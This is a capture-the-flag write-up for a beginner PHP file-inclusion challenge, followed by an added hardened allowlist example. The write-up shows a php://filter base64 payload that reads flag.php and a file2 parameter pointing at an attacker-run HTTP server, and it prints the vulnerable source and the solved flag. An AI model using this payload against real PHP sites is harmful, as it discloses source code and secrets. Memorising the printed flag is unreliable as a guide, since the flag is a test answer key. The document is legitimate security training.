攻防世界 (adworld): fileclude, beginner level
Difficulty: 1
Category: Web
Writeups: 13
Solves: 2346
Source: CTF
Description:
So many files!
┌──(kwkl㉿kwkl)-[~/HODL/adworld/web/fileinclude]
└─$ python3 -m http.server 5555
Serving HTTP on 0.0.0.0 port 5555 (http://0.0.0.0:5555/) ...
10.10.10.140 - - [20/Nov/2022 17:18:39] "GET / HTTP/1.1" 200 -
http://61.147.171.105:60895/??file1=php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php&file2=http://127.0.0.1:5555/file2.php
GET /?file1=php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php&file2=http://x.x.x.x:5555/file2.php HTTP/1.1
Host: 61.147.171.105:60895
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 0
HTTP/1.1 200 OK
Date: Sun, 20 Nov 2022 10:16:15 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.23
Vary: Accept-Encoding
Content-Length: 2529
Connection: close
Content-Type: text/html
WRONG WAY!
<?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET["file1"]) && isset($_GET["file2"]))
{
    $file1 = $_GET["file1"];
    $file2 = $_GET["file2"];
    if(!empty($file1) && !empty($file2))
    {
        if(file_get_contents($file2) === "hello ctf")
        {
            include($file1);
        }
    }
    else
        die("NONONO");
}
PD9waHAKZWNobyAiV1JPTkcgV0FZISI7Ci8vICRmbGFnID0gY3liZXJwZWFjZXtmYjJhN2M1OWFjMmFkYzI2MjNmYmQwYjEwMjIxODgzNX0=
// $flag = cyberpeace{fb2a7c59ac2adc2623fbd0b102218835}
<?php
echo "WRONG WAY!";
// $flag = cyberpeace{fb2a7c59ac2adc2623fbd0b102218835}
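
Added example, not part of the original writeup or the challenge code: a hardened counterpart to the `include($file1)` shown in the response above, where the request parameter only selects a key in a fixed map and never reaches `include` as a path or stream URL. The page names, the `pages/` directory and the helper function names are assumptions made for illustration.

```php
<?php
// Added example: the request value is looked up in a fixed map instead of
// being passed to include(). Page names and pages/ are hypothetical.

/** Fixed map from request-visible names to files on disk. */
function page_map()
{
    return array(
        'home'  => __DIR__ . '/pages/home.php',
        'about' => __DIR__ . '/pages/about.php',
    );
}

/** Return the allowlisted path for $name, or null for anything else. */
function resolve_page($name)
{
    $map = page_map();
    // Arrays (?file1[]=x), stream wrappers, traversal and absolute paths all
    // fail here because none of them is an exact key of the map.
    if (!is_string($name) || !isset($map[$name])) {
        return null;
    }
    return $map[$name];
}

/** True when $value starts with a stream wrapper or URL scheme (log signal). */
function has_stream_scheme($value)
{
    return is_string($value)
        && preg_match('#^\s*(?:[a-z][a-z0-9+.\-]*://|data:)#i', $value) === 1;
}

// Constructed inputs; the first two are the parameter values from the request above.
$samples = array(
    'php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php',
    'http://x.x.x.x:5555/file2.php',
    '../flag.php',
    'about',
);
foreach ($samples as $s) {
    $path = resolve_page($s);
    printf("%-7s scheme=%-3s %s\n",
        $path === null ? 'REJECT' : 'include',
        has_stream_scheme($s) ? 'yes' : 'no',
        $s);
}
// In a handler: $path = resolve_page(isset($_GET['file1']) ? $_GET['file1'] : null);
// respond 404 when it is null, otherwise include $path.
```

Setting `allow_url_fopen=Off` and `allow_url_include=Off` in php.ini stops the remote fetch used for `file2`, but `php://filter` on a local file still works with both off, so the allowlist is the control that closes the source disclosure.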